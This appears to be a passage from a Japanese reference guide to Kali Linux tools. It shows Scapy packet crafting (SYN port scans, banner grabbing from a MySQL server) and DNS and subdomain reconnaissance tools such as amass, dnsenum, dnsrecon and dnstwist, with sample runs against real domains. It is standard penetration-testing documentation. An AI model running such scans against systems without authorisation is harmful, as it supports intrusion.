is_promisc : Try to guess if target is in Promisc mode. The target is provided by its ip.
linehexdump : Build an equivalent view of hexdump() on a single line
ls : List available layers, or infos on a given layer class or name.
neighsol : Sends and receive an ICMPv6 Neighbor Solicitation message
overlap_frag : Build overlapping fragments to bypass NIPS
promiscping : Send ARP who-has requests to determine which hosts are in promiscuous mode
rderf : Read a ERF file and return a packet list
rdpcap : Read a pcap or pcapng file and return a packet list
report_ports : portscan a target and output a LaTeX table
restart : Restarts scapy
rfc : Generate an RFC-like representation of a packet def.
send : Send packets at layer 3
sendp : Send packets at layer 2
sendpfast : Send packets at layer 2 using tcpreplay for performance
smbclient : A simple smbclient CLI
sniff : Sniff packets and return a list of packets.
split_layers : Split 2 layers previously bound.
sr : Send and receive packets at layer 3
sr1 : Send packets at layer 3 and return only the first answer
sr1flood : Flood and receive packets at layer 3 and return only the first answer
srbt : send and receive using a bluetooth socket
srbt1 : send and receive 1 packet using a bluetooth socket
srflood : Flood and receive packets at layer 3
srloop : Send a packet at layer 3 in loop and print the answer each time
srp : Send and receive packets at layer 2
srp1 : Send and receive packets at layer 2 and return only the first answer
srp1flood : Flood and receive packets at layer 2 and return only the first answer
srpflood : Flood and receive packets at layer 2
srploop : Send a packet at layer 2 in loop and print the answer each time
tcpdump : Run tcpdump or tshark on a list of packets.
tdecode : Run tshark on a list of packets.
traceroute : Instant TCP traceroute
traceroute6 : Instant TCP traceroute using IPv6
traceroute_map : Util function to call traceroute on multiple targets, then
tshark : Sniff packets and print them calling pkt.summary().
wireshark : Runs Wireshark on a list of packets.
wrerf : Write a list of packets to a ERF file
wrpcap : Write a list of packets to a pcap file
wrpcapng : Write a list of packets to a pcapng file
■ 使用例
root@kali:~# scapy -H
Welcome to Scapy (2.6.0) using IPython 8.20.0
# DNSクエリを送信
>>> ans = sr1(IP(dst="8.8.8.8") / UDP(dport=53) / DNS(rd=1, qd=DNSQR(qname="example.com")))
Begin emission
Finished sending 1 packets
Received 1 packets, got 1 answers, remaining 0 packets
>>> ans["DNS"].summary()
'DNS Ans 93.184.215.14'
# ポートスキャン
>>> ans, unans = sr(IP(dst="93.184.215.14") / TCP(dport=[21,22,80,443], flags="S"))
Begin emission
Finished sending 4 packets
Received 6 packets, got 4 answers, remaining 0 packets
>>> ans.summary(lfilter = lambda s,r: r.sprintf("%TCP.flags%") == "SA",prn=lambda s,r: r.sprintf("%TCP.sport% is open"))
http is open
https is open
>>> ans.summary(lfilter = lambda s,r: r.sprintf("%TCP.flags%") == "RA",prn=lambda s,r: r.sprintf("%TCP.sport% is close"))
ssh is close
ftp is close
# MySQLサーバーとのハンドシェイク
# 必要に応じて iptables -A OUTPUT -p tcp --tcp-flags RST RST -s <送信元ホストのIPアドレス> -j DROP を行う(OS側で先にRSTを送信してしまうため)
>>> def handshake():
...: sport = random.randint(1024, 65535)
...: seq = random.randint(1000, 2000)
...: ip = IP(dst="192.168.11.4")
...: syn_ack = sr1(ip / TCP(sport=sport, dport=3306, flags="S", seq=seq))
...: return sr(ip / TCP(sport=sport, dport=3306, flags="A", seq=syn_ack.ack, ack=syn_ack.seq + 1))
...:
>>> ans, unans = handshake()
Begin emission
..*
Finished sending 1 packets
Received 3 packets, got 1 answers, remaining 0 packets
Begin emission
Finished sending 1 packets
*
Received 1 packets, got 1 answers, remaining 0 packets
>>> raw = ans[0].answer["Raw"].load
# プロトコルバージョン(バージョン10)以降で最初にNULLバイトが出現するまでのデータを抽出(サーバーバージョン)
>>> print(raw[raw.index(b'\x0a') + 1:raw.index(b'\x00', raw.index(b'\x0a') + 1)].decode('ascii'))
5.0.51a-3ubuntu5
Recon and Information Gathering Tools
DNS Enumeration
Altdns
指定されたドメイン(またはサブドメイン)と単語リストを組み合わせてサブドメインのリストを作成します。
■ 使用方法
root@kali:~# altdns --help
usage: altdns [-h] -i INPUT -o OUTPUT [-w WORDLIST] [-r] [-n] [-e] [-d DNSSERVER] [-s SAVE] [-t THREADS]
options:
-h, --help show this help message and exit
-i INPUT, --input INPUT
List of subdomains input
-o OUTPUT, --output OUTPUT
Output location for altered subdomains
-w WORDLIST, --wordlist WORDLIST
List of words to alter the subdomains with
-r, --resolve Resolve all altered subdomains
-n, --add-number-suffix
Add number suffix to every domain (0-9)
-e, --ignore-existing
Ignore existing domains in file
-d DNSSERVER, --dnsserver DNSSERVER
IP address of resolver to use (overrides system default)
-s SAVE, --save SAVE File to save resolved altered subdomains to
-t THREADS, --threads THREADS
Amount of threads to run simultaneously
■ 使用例
root@kali:~# echo "www.nhk.or.jp" > subdomains.txt
root@kali:~# echo -e "1n\n2\n3\n4" > words.txt
# サブドメインのリストを作成して名前解決を行う
root@kali:~# altdns -i subdomains.txt -o out.txt -w words.txt -r -s result.txt
www4.nhk.or.jp : www4.gslb.nhk.or.jp.
www2.nhk.or.jp : www2.gslb.nhk.or.jp.
www3.nhk.or.jp : nhk.or.jp.edgekey.net.
root@kali:~# head -n 5 altered_subdomains.txt
www-1n.nhk.or.jp
www4.nhk.or.jp
www.3.nhk.or.jp
4.www.nhk.or.jp
www2.nhk.or.jp
root@kali:~# cat resolved_subdomains.txt
www4.nhk.or.jp:www4.gslb.nhk.or.jp.
www2.nhk.or.jp:www2.gslb.nhk.or.jp.
www3.nhk.or.jp:nhk.or.jp.edgekey.net.
OWASP Amass
インターネット上の様々なパブリック/プライベート・データソースを使用してドメインの情報を収集します。
| Technique | Data Sources |
|---|---|
| APIs | 360PassiveDNS, Ahrefs, AnubisDB, BeVigil, BinaryEdge, BufferOver, BuiltWith, C99, Chaos, CIRCL, DNSDB, DNSRepo, Deepinfo, Detectify, FOFA, FullHunt, GitHub, GitLab, GrepApp, Greynoise, HackerTarget, Hunter, IntelX, LeakIX, Maltiverse, Mnemonic, Netlas, Pastebin, PassiveTotal, PentestTools, Pulsedive, Quake, SOCRadar, Searchcode, Shodan, Spamhaus, Sublist3rAPI, SubdomainCenter, ThreatBook, ThreatMiner, URLScan, VirusTotal, Yandex, ZETAlytics, ZoomEye |
| Certificates | Active pulls (optional), Censys, CertCentral, CertSpotter, Crtsh, Digitorus, FacebookCT |
| DNS | Brute forcing, Reverse DNS sweeping, NSEC zone walking, Zone transfers, FQDN alterations/permutations, FQDN Similarity-based Guessing |
| Routing | ASNLookup, BGPTools, BGPView, BigDataCloud, IPdata, IPinfo, RADb, Robtex, ShadowServer, TeamCymru |
| Scraping | AbuseIPDB, Ask, Baidu, Bing, CSP Header, DNSDumpster, DNSHistory, DNSSpy, DuckDuckGo, Gists, Google, HackerOne, HyperStat, PKey, RapidDNS, Riddler, Searx, SiteDossier, Yahoo |
| Web Archives | Arquivo, CommonCrawl, HAW, PublicWWW, UKWebArchive, Wayback |
| WHOIS | AlienVault, AskDNS, DNSlytics, ONYPHE, SecurityTrails, SpyOnWeb, WhoisXMLAPI |
[ amass intel ]
■ 使用方法
root@kali:~# amass intel -help
Usage: amass intel [options] [-whois -d DOMAIN] [-addr ADDR -asn ASN -cidr CIDR]
-active
Attempt certificate name grabs
-addr value
IPs and ranges (192.168.1.1-254) separated by commas
-asn value
ASNs separated by commas (can be used multiple times)
-cidr value
CIDRs separated by commas (can be used multiple times)
-config string
Path to the YAML configuration file. Additional details below
-d value
Domain names separated by commas (can be used multiple times)
-demo
Censor output to make it suitable for demonstrations
-df value
Path to a file providing root domain names
-dir string
Path to the directory containing the output files
-ef string
Path to a file providing data sources to exclude
-exclude value
Data source names separated by commas to be excluded
-h Show the program usage message
-help
Show the program usage message
-if string
Path to a file providing data sources to include
-include value
Data source names separated by commas to be included
-ip
Show the IP addresses for discovered names
-ipv4
Show the IPv4 addresses for discovered names
-ipv6
Show the IPv6 addresses for discovered names
-list
Print additional information
-log string
Path to the log file where errors will be written
-max-dns-queries int
Maximum number of concurrent DNS queries
-o string
Path to the text file containing terminal stdout/stderr
-org string
Search string provided against AS description information
-p value
Ports separated by commas (default: 80, 443)
-r value
IP addresses of preferred DNS resolvers (can be used multiple times)
-rf value
Path to a file providing preferred DNS resolvers
-timeout int
Number of minutes to let enumeration run before quitting
-v Output status / debug / troubleshooting info
-whois
All provided domains are run through reverse whois
■ 使用例
# 指定されたドメインのWHOIS情報をもとにその組織に関連するドメインを探す
#(主にWHOIS情報の公開連絡窓口のメールアドレスのドメインが一致するものなど)
root@kali:~# amass intel -d digital.go.jp -whois -config config.yaml
geps.jp
digitalgov.jp
g-eps.jp
g20-digital.go.jp
p-portal.jp
digiso.jp
xn--5ckzcybvd9594d88g.jp
g-eps.net
dejital.jp
gops.jp
g-eps.com
digitalgo.jp
[ amass enum ]
■ 使用方法
root@kali:~# amass enum -help
Usage: amass enum [options] -d DOMAIN
-active
Attempt zone transfers and certificate name grabs
-addr value
IPs and ranges (192.168.1.1-254) separated by commas
-alts
Enable generation of altered names
-asn value
ASNs separated by commas (can be used multiple times)
-aw value
Path to a different wordlist file for alterations
-awm value
"hashcat-style" wordlist masks for name alterations
-bl value
Blacklist of subdomain names that will not be investigated
-blf string
Path to a file providing blacklisted subdomains
-brute
Execute brute forcing after searches
-cidr value
CIDRs separated by commas (can be used multiple times)
-config string
Path to the YAML configuration file. Additional details below
-d value
Domain names separated by commas (can be used multiple times)
-demo
Censor output to make it suitable for demonstrations
-df value
Path to a file providing root domain names
-dir string
Path to the directory containing the output files
-dns-qps int
Maximum number of DNS queries per second across all resolvers
-ef string
Path to a file providing data sources to exclude
-exclude value
Data source names separated by commas to be excluded
-h Show the program usage message
-help
Show the program usage message
-if string
Path to a file providing data sources to include
-iface string
Provide the network interface to send traffic through
-include value
Data source names separated by commas to be included
-list
Print the names of all available data sources
-log string
Path to the log file where errors will be written
-max-depth int
Maximum number of subdomain labels for brute forcing
-max-dns-queries int
Deprecated flag to be replaced by dns-qps in version 4.0
-min-for-recursive int
Subdomain labels seen before recursive brute forcing (Default: 1) (default 1)
-nf value
Path to a file providing already known subdomain names (from other tools/sources)
-nocolor
Disable colorized output
-norecursive
Turn off recursive brute forcing
-o string
Path to the text file containing terminal stdout/stderr
-oA string
Path prefix used for naming all output files
-p value
Ports separated by commas (default: 80, 443)
-passive
Deprecated since passive is the default setting
-r value
IP addresses of untrusted DNS resolvers (can be used multiple times)
-rf value
Path to a file providing untrusted DNS resolvers
-rqps int
Maximum number of DNS queries per second for each untrusted resolver
-scripts string
Path to a directory containing ADS scripts
-silent
Disable all output during execution
-timeout int
Number of minutes to let enumeration run before quitting
-tr value
IP addresses of trusted DNS resolvers (can be used multiple times)
-trf value
Path to a file providing trusted DNS resolvers
-trqps int
Maximum number of DNS queries per second for each trusted resolver
-v Output status / debug / troubleshooting info
-w value
Path to a different wordlist file for brute forcing
-wm value
"hashcat-style" wordlist masks for DNS brute forcing
■ 使用例
# DNSの列挙とターゲットのマッピングを行う
root@kali:~# amass enum -passive -d digital.go.jp -config config.yaml
digital.go.jp (FQDN) --> mx_record --> digital-go-jp.mail.protection.outlook.com (FQDN)
www.digital.go.jp (FQDN) --> cname_record --> d30g3edt6pkfyb.cloudfront.net (FQDN)
vjw-lp.digital.go.jp (FQDN) --> cname_record --> vjw-lp.web.app (FQDN)
services.digital.go.jp (FQDN) --> cname_record --> da-web-service-intro-prd.web.app (FQDN)
mynumber-pr.digital.go.jp (FQDN) --> cname_record --> d3qav5ugx9y79i.cloudfront.net (FQDN)
app-stg.payment.digital.go.jp (FQDN) --> cname_record --> d-cr3h2hr57c.execute-api.ap-northeast-1.amazonaws.com (FQDN)
dashboard.payment.digital.go.jp (FQDN) --> cname_record --> d-3alt7hg4c3.execute-api.ap-northeast-1.amazonaws.com (FQDN)
console.developers.digital.go.jp (FQDN) --> cname_record --> d1377vqmx05042.cloudfront.net (FQDN)
well-being.digital.go.jp (FQDN) --> a_record --> 3.114.187.131 (IPAddress)
well-being.digital.go.jp (FQDN) --> a_record --> 52.192.197.43 (IPAddress)
[...]
assetfinder
crt.sh、certspotter、hackertargetなど複数のデータソースを使用して指定されたドメインに関連するドメインおよびサブドメインを検索します。
■ 使用方法
root@kali:~# assetfinder --help
Usage of assetfinder:
-subs-only
Only include subdomains of search domain
■ 使用例
root@kali:~# assetfinder --subs-only qiita.com | sort | uniq | head -n 5
*.terminated.qiita.com
119.qiita.com
ads.qiita.com
app.teams.qiita.com
blog.qiita.com
dnsenum
指定されたドメインのDNS情報を列挙します。
■ 使用方法
root@kali:~# dnsenum --help
Usage: dnsenum [Options] <domain>
[Options]:
Note: If no -f tag supplied will default to /usr/share/dnsenum/dns.txt or
the dns.txt file in the same directory as dnsenum
GENERAL OPTIONS:
--dnsserver <server>
Use this DNS server for A, NS and MX queries.
--enum Shortcut option equivalent to --threads 5 -s 15 -w.
-h, --help Print this help message.
--noreverse Skip the reverse lookup operations.
--nocolor Disable ANSIColor output.
--private Show and save private ips at the end of the file domain_ips.txt.
--subfile <file> Write all valid subdomains to this file.
-t, --timeout <value> The tcp and udp timeout values in seconds (default: 10s).
--threads <value> The number of threads that will perform different queries.
-v, --verbose Be verbose: show all the progress and all the error messages.
GOOGLE SCRAPING OPTIONS:
-p, --pages <value> The number of google search pages to process when scraping names,
the default is 5 pages, the -s switch must be specified.
-s, --scrap <value> The maximum number of subdomains that will be scraped from Google (default 15).
BRUTE FORCE OPTIONS:
-f, --file <file> Read subdomains from this file to perform brute force. (Takes priority over default dns.txt)
-u, --update <a|g|r|z>
Update the file specified with the -f switch with valid subdomains.
a (all) Update using all results.
g Update using only google scraping results.
r Update using only reverse lookup results.
z Update using only zonetransfer results.
-r, --recursion Recursion on subdomains, brute force all discovered subdomains that have an NS record.
WHOIS NETRANGE OPTIONS:
-d, --delay <value> The maximum value of seconds to wait between whois queries, the value is defined randomly, default: 3s.
-w, --whois Perform the whois queries on c class network ranges.
**Warning**: this can generate very large netranges and it will take lot of time to perform reverse lookups.
REVERSE LOOKUP OPTIONS:
-e, --exclude <regexp>
Exclude PTR records that match the regexp expression from reverse lookup results, useful on invalid hostnames.
OUTPUT OPTIONS:
-o --output <file> Output in XML format. Can be imported in MagicTree (www.gremwell.com)
■ 使用例
root@kali:~# dnsenum qiita.com --file dns.txt --noreverse
dnsenum VERSION:1.3.1
----- qiita.com -----
Host\'s addresses:
__________________
qiita.com. 52 IN A 18.179.159.154
qiita.com. 52 IN A 52.198.50.148
qiita.com. 52 IN A 35.73.37.55
Wildcard detection using: gbjxjheemwlb
_______________________________________
gbjxjheemwlb.qiita.com. 60 IN A 35.74.119.220
gbjxjheemwlb.qiita.com. 60 IN A 13.113.218.100
gbjxjheemwlb.qiita.com. 60 IN A 52.192.78.222
!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Wildcards detected, all subdomains will point to the same IP address
Omitting results containing 35.74.119.220, 13.113.218.100, 52.192.78.222.
Maybe you are using OpenDNS servers.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Name Servers:
______________
ns-1049.awsdns-03.org. 85733 IN A 205.251.196.25
ns-1956.awsdns-52.co.uk. 85727 IN A 205.251.199.164
ns-171.awsdns-21.com. 85730 IN A 205.251.192.171
ns-772.awsdns-32.net. 11694 IN A 205.251.195.4
Mail (MX) Servers:
___________________
aspmx3.googlemail.com. 293 IN A 142.250.115.27
aspmx4.googlemail.com. 293 IN A 108.177.104.27
aspmx5.googlemail.com. 293 IN A 142.250.152.27
aspmx.l.google.com. 293 IN A 64.233.187.26
alt1.aspmx.l.google.com. 91 IN A 142.250.141.26
alt2.aspmx.l.google.com. 293 IN A 142.250.115.27
aspmx2.googlemail.com. 293 IN A 142.250.141.27
[...]
dnsgen
与えられたドメインから単語リストをもとに様々な組み合わせのドメインを生成します。
■ 使用方法
root@kali:~# dnsgen --help
Usage: dnsgen [OPTIONS] FILENAME
Options:
-l, --wordlen INTEGER RANGE Min length of custom words extracted from
domains. [1<=x<=100]
-w, --wordlist PATH Path to custom wordlist.
-f, --fast Fast generation.
--help Show this message and exit.
■ 使用例
root@kali:~# echo "app.example.com" | dnsgen -
help.app.example.com
app.help.example.com
dev.app.example.com
app.dev.example.com
mobileclient.app.example.com
app.mobileclient.example.com
history.app.example.com
app.history.example.com
frontpage.app.example.com
[...]
v3.example.com
documentation.example.com
lab.example.com
repo.example.com
uploads.example.com
vpn.example.com
old.example.com
DNSRecon
一般的なDNSレコード(MX、SOA、NS、A、AAAA、SPF、TXT)およびSRVレコード、PTRレコードの列挙、サブドメインの探索などを行います。
■ 使用方法
root@kali:~# dnsrecon --help
usage: dnsrecon [-h] [-d DOMAIN] [-n NS_SERVER] [-r RANGE] [-D DICTIONARY] [-f] [-a] [-s] [-b] [-y] [-k] [-w] [-z] [--threads THREADS] [--lifetime LIFETIME]
[--tcp] [--db DB] [-x XML] [-c CSV] [-j JSON] [--iw] [--disable_check_recursion] [--disable_check_bindversion] [-V] [-v] [-t TYPE]
options:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Target domain.
-n NS_SERVER, --name_server NS_SERVER
Domain server to use. If none is given, the SOA of the target will be used. Multiple servers can be specified using a comma separated list.
-r RANGE, --range RANGE
IP range for reverse lookup brute force in formats (first-last) or in (range/bitmask).
-D DICTIONARY, --dictionary DICTIONARY
Dictionary file of subdomain and hostnames to use for brute force.
-f Filter out of brute force domain lookup, records that resolve to the wildcard defined IP address when saving records.
-a Perform AXFR with standard enumeration.
-s Perform a reverse lookup of IPv4 ranges in the SPF record with standard enumeration.
-b Perform Bing enumeration with standard enumeration.
-y Perform Yandex enumeration with standard enumeration.
-k Perform crt.sh enumeration with standard enumeration.
-w Perform deep whois record analysis and reverse lookup of IP ranges found through Whois when doing a standard enumeration.
-z Performs a DNSSEC zone walk with standard enumeration.
--threads THREADS Number of threads to use in reverse lookups, forward lookups, brute force and SRV record enumeration.
--lifetime LIFETIME Time to wait for a server to respond to a query. default is 3.0
--tcp Use TCP protocol to make queries.
--db DB SQLite 3 file to save found records.
-x XML, --xml XML XML file to save found records.
-c CSV, --csv CSV Save output to a comma separated value file.
-j JSON, --json JSON save output to a JSON file.
--iw Continue brute forcing a domain even if a wildcard record is discovered.
--disable_check_recursion
Disables check for recursion on name servers
--disable_check_bindversion
Disables check for BIND version on name servers
-V, --version Show DNSrecon version
-v, --verbose Enable verbose
-t TYPE, --type TYPE Type of enumeration to perform.
Possible types:
std: SOA, NS, A, AAAA, MX and SRV.
rvl: Reverse lookup of a given CIDR or IP range.
brt: Brute force domains and hosts using a given dictionary.
srv: SRV records.
axfr: Test all NS servers for a zone transfer.
bing: Perform Bing search for subdomains and hosts.
yand: Perform Yandex search for subdomains and hosts.
crt: Perform crt.sh search for subdomains and hosts.
snoop: Perform cache snooping against all NS servers for a given domain, testing
all with file containing the domains, file given with -D option.
tld: Remove the TLD of given domain and test against all TLDs registered in IANA.
zonewalk: Perform a DNSSEC zone walk using NSEC records.
■ 使用例
root@kali:~# dnsrecon -d example.com -t std
[*] std: Performing General Enumeration against: example.com...
[-] DNSSEC is not configured for example.com
[*] SOA ns.icann.org 199.4.138.53
[*] SOA ns.icann.org 2001:500:89::53
[*] NS a.iana-servers.net 199.43.135.53
[*] Bind Version for 199.43.135.53 3"
[*] NS a.iana-servers.net 2001:500:8f::53
[*] Bind Version for 2001:500:8f::53 3"
[*] NS b.iana-servers.net 199.43.133.53
[*] Bind Version for 199.43.133.53 4"
[*] NS b.iana-servers.net 2001:500:8d::53
[*] Bind Version for 2001:500:8d::53 4"
[*] A example.com 93.184.215.14
[*] AAAA example.com 2606:2800:21f:cb07:6820:80da:af6b:8b2c
[*] TXT example.com v=spf1 -all
[*] TXT example.com wgyf8z8cgvm2qmxpnbnldrcltvk4xqfn
[*] TXT _dmarc.example.com v=DMARC1;p=reject;sp=reject;adkim=s;aspf=s
[*] TXT _dmarc._domainkey.example.com v=DKIM1; p=
[*] Enumerating SRV Records
[-] No SRV Records Found for example.com
dnstracer
指定されたドメインに対して指定されたドメインネームサーバー (DNS) がどこから情報を取得したかのかをDNSサーバーの連鎖をたどって表示します。
■ 使用方法
root@kali:~# dnstracer --help
Usage: dnstracer [options] [host]
-c: disable local caching, default enabled
-C: enable negative caching, default disabled
-o: enable overview of received answers, default disabled
-q <querytype>: query-type to use for the DNS requests, default A
-r <retries>: amount of retries for DNS requests, default 3
-s <server>: use this server for the initial request, default localhost
If . is specified, A.ROOT-SERVERS.NET will be used.
-t <maximum timeout>: Limit time to wait per try
-v: verbose
-S <ip address>: use this source address.
-4: don\'t query IPv6 servers
■ 使用例
# 初期リクエストの送信先をルートサーバーにして追跡を行う
root@kali:~# dnstracer -s . -4 qiita.com
Tracing to qiita.com[a] via A.ROOT-SERVERS.NET, maximum of 3 retries
A.ROOT-SERVERS.NET [.] (198.41.0.4)
|\___ e.gtld-servers.net [com] (192.12.94.30)
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (205.251.199.164) Got authoritative answer
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (2600:9000:5307:a400:0000:0000:0000:0001) Not queried
| |\___ ns-1049.awsdns-03.org [qiita.com] (205.251.196.25) Got authoritative answer
| |\___ ns-1049.awsdns-03.org [qiita.com] (2600:9000:5304:1900:0000:0000:0000:0001) Not queried
| |\___ ns-772.awsdns-32.net [qiita.com] (205.251.195.4) Got authoritative answer
| |\___ ns-772.awsdns-32.net [qiita.com] (2600:9000:5303:0400:0000:0000:0000:0001) Not queried
| \___ ns-171.awsdns-21.com [qiita.com] (205.251.192.171) Got authoritative answer
|\___ e.gtld-servers.net [com] (2001:0502:1ca1:0000:0000:0000:0000:0030) Not queried
|\___ c.gtld-servers.net [com] (192.26.92.30)
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (205.251.199.164) (cached)
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (2600:9000:5307:a400:0000:0000:0000:0001) Not queried
| |\___ ns-1049.awsdns-03.org [qiita.com] (205.251.196.25) (cached)
| |\___ ns-1049.awsdns-03.org [qiita.com] (2600:9000:5304:1900:0000:0000:0000:0001) Not queried
| |\___ ns-772.awsdns-32.net [qiita.com] (205.251.195.4) (cached)
| |\___ ns-772.awsdns-32.net [qiita.com] (2600:9000:5303:0400:0000:0000:0000:0001) Not queried
| \___ ns-171.awsdns-21.com [qiita.com] (205.251.192.171) (cached)
|\___ c.gtld-servers.net [com] (2001:0503:83eb:0000:0000:0000:0000:0030) Not queried
|\___ a.gtld-servers.net [com] (192.5.6.30)
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (205.251.199.164) (cached)
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (2600:9000:5307:a400:0000:0000:0000:0001) Not queried
| |\___ ns-1049.awsdns-03.org [qiita.com] (205.251.196.25) (cached)
| |\___ ns-1049.awsdns-03.org [qiita.com] (2600:9000:5304:1900:0000:0000:0000:0001) Not queried
| |\___ ns-772.awsdns-32.net [qiita.com] (205.251.195.4) (cached)
| |\___ ns-772.awsdns-32.net [qiita.com] (2600:9000:5303:0400:0000:0000:0000:0001) Not queried
| \___ ns-171.awsdns-21.com [qiita.com] (205.251.192.171) (cached)
|\___ a.gtld-servers.net [com] (2001:0503:a83e:0000:0000:0000:0002:0030) Not queried
|\___ g.gtld-servers.net [com] (192.42.93.30)
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (205.251.199.164) (cached)
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (2600:9000:5307:a400:0000:0000:0000:0001) Not queried
| |\___ ns-1049.awsdns-03.org [qiita.com] (205.251.196.25) (cached)
| |\___ ns-1049.awsdns-03.org [qiita.com] (2600:9000:5304:1900:0000:0000:0000:0001) Not queried
| |\___ ns-772.awsdns-32.net [qiita.com] (205.251.195.4) (cached)
| |\___ ns-772.awsdns-32.net [qiita.com] (2600:9000:5303:0400:0000:0000:0000:0001) Not queried
| \___ ns-171.awsdns-21.com [qiita.com] (205.251.192.171) (cached)
|\___ g.gtld-servers.net [com] (2001:0503:eea3:0000:0000:0000:0000:0030) Not queried
|\___ i.gtld-servers.net [com] (192.43.172.30)
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (205.251.199.164) (cached)
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (2600:9000:5307:a400:0000:0000:0000:0001) Not queried
| |\___ ns-1049.awsdns-03.org [qiita.com] (205.251.196.25) (cached)
| |\___ ns-1049.awsdns-03.org [qiita.com] (2600:9000:5304:1900:0000:0000:0000:0001) Not queried
| |\___ ns-772.awsdns-32.net [qiita.com] (205.251.195.4) (cached)
| |\___ ns-772.awsdns-32.net [qiita.com] (2600:9000:5303:0400:0000:0000:0000:0001) Not queried
| \___ ns-171.awsdns-21.com [qiita.com] (205.251.192.171) (cached)
|\___ i.gtld-servers.net [com] (2001:0503:39c1:0000:0000:0000:0000:0030) Not queried
|\___ m.gtld-servers.net [com] (192.55.83.30)
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (205.251.199.164) (cached)
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (2600:9000:5307:a400:0000:0000:0000:0001) Not queried
| |\___ ns-1049.awsdns-03.org [qiita.com] (205.251.196.25) (cached)
| |\___ ns-1049.awsdns-03.org [qiita.com] (2600:9000:5304:1900:0000:0000:0000:0001) Not queried
| |\___ ns-772.awsdns-32.net [qiita.com] (205.251.195.4) (cached)
| |\___ ns-772.awsdns-32.net [qiita.com] (2600:9000:5303:0400:0000:0000:0000:0001) Not queried
| \___ ns-171.awsdns-21.com [qiita.com] (205.251.192.171) (cached)
|\___ m.gtld-servers.net [com] (2001:0501:b1f9:0000:0000:0000:0000:0030) Not queried
[...]
dnstwist
指定されたドメインと類似したドメインをファジングアルゴリズムで生成し、なりすましドメインを生成・検出します。
■ 使用方法
root@kali:~# dnstwist --help
usage: /usr/bin/dnstwist [OPTION]... DOMAIN
positional arguments:
domain Domain name or URL to scan
options:
-a, --all Print all DNS records instead of the first ones
-b, --banners Determine HTTP and SMTP service banners
-d FILE, --dictionary FILE Generate more domains using dictionary FILE
-f FORMAT, --format FORMAT Output format: cli, csv, json, list (default: cli)
--fuzzers LIST Use only selected fuzzing algorithms (separated with commas)
-g, --geoip Lookup for GeoIP location
--lsh [LSH] Evaluate web page similarity with LSH algorithm: ssdeep, tlsh (default: ssdeep)
--lsh-url URL Override URL to fetch the original web page from
-m, --mxcheck Check if MX host can be used to intercept emails
-o FILE, --output FILE Save output to FILE
-r, --registered Show only registered domain names
-u, --unregistered Show only unregistered domain names
-p, --phash Render web pages and evaluate visual similarity
--phash-url URL Override URL to render the original web page from
--screenshots DIR Save web page screenshots into DIR
-t NUM, --threads NUM Start specified NUM of threads (default: 12)
-w, --whois Lookup WHOIS database for creation date and registrar
--tld FILE Swap TLD for the original domain from FILE
--nameservers LIST DNS or DoH servers to query (separated with commas)
--useragent STRING Set User-Agent STRING (default: Mozilla/5.0 (linux 64-bit) dnstwist/20240812)
■ 使用例
root@kali:~# dnstwist -r github.com
[...]
permutations: 100.00% of 2406 | found: 156 | eta: 0m 00s | speed: 47 qps
*original github.com 20.27.177.113 NS:dns1.p08.nsone.net MX:alt1.aspmx.l.google.com
addition githubd.com 103.224.212.215 NS:ns1.abovedomains.com MX:park-mx.above.com
addition githubu.com 103.224.212.215 NS:ns1.abovedomains.com MX:park-mx.above.com
addition github4.com 104.143.143.3 NS:a.share-dns.com
addition github6.com 104.21.40.115 2606:4700:3032::ac43:b98a NS:gail.ns.cloudflare.com
addition githubq.com 104.21.49.123 2606:4700:3030::6815:317b NS:drake.ns.cloudflare.com MX:route1.mx.cloudflare.net
[...]
bitsquatting gitjub.com 103.224.182.239 NS:ns1.abovedomains.com MX:park-mx.above.com
bitsquatting gkthub.com 104.21.47.41 2606:4700:3036::6815:2f29 NS:sue.ns.cloudflare.com MX:mx.yandex.ru
bitsquatting withub.com 124.156.195.144 NS:dns3.hichina.com MX:mailserver.purelymail.com
bitsquatting gythub.com 13.248.169.48 NS:ns1.namefind.com
bitsquatting gitiub.com 140.82.10.104 NS:ns1.vultr.com MX:gitiub.com
bitsquatting giphub.com 173.232.29.99 NS:ray.ns.cloudflare.com
[...]
homoglyph gìthub.com 104.21.67.116 2606:4700:3034::ac43:ddd6 NS:angela.ns.cloudflare.com
homoglyph ɡithub.com 107.180.21.235 NS:ns25.domaincontrol.com
homoglyph githuḅ.com 127.0.0.1 NS:adel.ns.cloudflare.com MX:mx.zoho.eu
homoglyph githüb.com 15.197.148.33 NS:ns69.domaincontrol.com
homoglyph gıthub.com 162.213.255.27 NS:dns1.namecheaphosting.com MX:mx1-hosting.jellyfish.systems
homoglyph git1ub.com 172.105.161.56 NS:dns1.registrar-servers.com MX:mx1.privateemail.com
homoglyph githuib.com 185.107.56.57 NS:ns1.weaponizedcow.com
[...]
insertion gituhub.com 103.224.182.246 NS:ns1.abovedomains.com MX:park-mx.above.com
insertion giuthub.com 103.224.182.246 NS:ns1.abovedomains.com MX:park-mx.above.com
insertion ghithub.com 103.224.212.214 NS:ns1.abovedomains.com MX:park-mx.above.com
insertion gifthub.com 13.248.169.48 NS:ns5.afternic.com MX:
insertion githuhb.com 162.210.196.171 NS:ns1.taipandns.com
insertion gitjhub.com 162.210.196.173 NS:ns1.numbatdns.com
[...]
replacement giyhub.com 103.224.182.239 NS:ns1.abovedomains.com MX:park-mx.above.com
replacement githyb.com 103.224.182.244 NS:ns1.abovedomains.com MX:park-mx.above.com
replacement hithub.com 104.21.82.76 2606:4700:3033::ac43:c65b NS:clint.ns.cloudflare.com
replacement g8thub.com 107.161.23.204 NS:ns1.dnsowl.com
replacement gi5hub.com 107.161.23.204 NS:ns1.dnsowl.com
[...]
transposition gtihub.com NS:ns1.dnsowl.com
transposition igthub.com NS:ns1djs.name.com
various githubcom.com 199.59.243.227 NS:ns1.bodis.com
vowel-swap githab.com 162.210.199.65 NS:ns1.koaladns.com
